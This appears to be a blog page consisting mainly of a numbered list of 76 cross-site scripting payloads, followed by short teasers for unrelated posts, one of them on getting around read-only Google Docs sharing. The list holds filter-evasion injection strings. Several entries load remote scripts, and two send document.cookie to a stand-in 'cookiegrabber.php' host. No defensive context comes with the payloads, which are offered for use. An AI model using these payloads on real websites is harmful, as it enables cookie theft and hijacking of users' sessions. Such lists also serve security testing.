1. <script>alert(1);</script>
  2. <script>alert('XSS');</script>
  3. <script src="http://www.evilsite.org/cookiegrabber.php"></script>
  4. <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script>
  5. <scr<script>ipt>alert('XSS');</scr</script>ipt>
  6. <script>alert(String.fromCharCode(88,83,83))</script>
  7. <img src=foo.png onerror=alert(/xssed/) />
  8. <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
  9. <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
  10. <marquee><script>alert('XSS')</script></marquee>
  11. <IMG SRC=\"jav&#x09;ascript:alert('XSS');\">
  12. <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">
  13. <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">
  14. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  15. "><script>alert(0)</script>
  16. <script src=http://yoursite.com/your_files.js></script>
  17. </title><script>alert(/xss/)</script>
  18. </textarea><script>alert(/xss/)</script>
  19. <IMG LOWSRC=\"javascript:alert('XSS')\">
  20. <IMG DYNSRC=\"javascript:alert('XSS')\">
  21. <font style='color:expression(alert(document.cookie))'>
  22. '); alert('XSS
  23. <img src="javascript:alert('XSS')">
  24. <script language="JavaScript">alert('XSS')</script>
  25. [url=javascript:alert('XSS');]click me[/url]
  26. <body onunload="javascript:alert('XSS');">
  27. <body onLoad="alert('XSS');"
  28. [color=red' onmouseover="alert('xss')"]mouse over[/color]
  29. "/></a></><img src=1.gif onerror=alert(1)>
  30. window.alert("Bonjour !");
  31. <div style="x:expression((window.r==1)?'':eval('r=1;
  32. alert(String.fromCharCode(88,83,83));'))">
  33. <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
  34. "><script alert(String.fromCharCode(88,83,83))</script>
  35. '>><marquee><h1>XSS</h1></marquee>
  36. '">><script>alert('XSS')</script>
  37. '">><marquee><h1>XSS</h1></marquee>
  38. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
  39. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
  40. <script>var var = 1; alert(var)</script>
  41. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  42. <?='<SCRIPT>alert("XSS")</SCRIPT>'?>
  43. <IMG SRC='vbscript:msgbox(\"XSS\")'>
  44. " onfocus=alert(document.domain) "> <"
  45. <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
  46. <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
  47. perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
  48. perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
  49. <br size=\"&{alert('XSS')}\">
  50. <scrscriptipt>alert(1)</scrscriptipt>
  51. </br style=a:expression(alert())>
  52. </script><script>alert(1)</script>
  53. "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
  54. [color=red width=expression(alert(123))][color]
  55. <BASE HREF="javascript:alert('XSS');//">
  56. Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
  57. "></iframe><script>alert(123)</script>
  58. <body onLoad="while(true) alert('XSS');">
  59. '"></title><script>alert(1111)</script>
  60. </textarea>'"><script>alert(document.cookie)</script>
  61. '""><script language="JavaScript"> alert('X \nS \nS');</script>
  62. </script></script><<<<script><>>>><<<script>alert(123)</script>
  63. <html><noalert><noscript>(123)</noscript><script>(123)</script>
  64. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  65. '></select><script>alert(123)</script>
  66. '>"><script src = 'http://www.site.com/XSS.js'></script>
  67. }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
  68. <SCRIPT>document.write("XSS");</SCRIPT>
  69. a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
  70. ='><script>alert("xss")</script>
  71. <script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
  72. <body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
  73. ">/PlanetCreator/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>
  74. ">/PlanetCreator/><script>alert(document.cookie)</script>
  75. src="http://www.site.com/XSS.js">
  76. data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=

Explore More

What’s Next for Virtualization: Optimizing the Environment

As the server virtualization market continues to mature and more companies adopt server virtualization as a standard within their environments, the concerns and questions we hear day to day about

Yet another simple Google Docs hack

A simple hack that allow you to edit read only Google docs is explained here http://googlesystem.blogspot.com/2009/01/copy-google-documents-to-your-account.html It works and all you need is to hack the url a bit like

Press Conference briefing on the possibility of being shortest man in the world!!!

This is not hacking or security news, just about my some favorite news while I’m arriving at yangon, myanmar. I’ve been here around 3 months and waiting visa approval to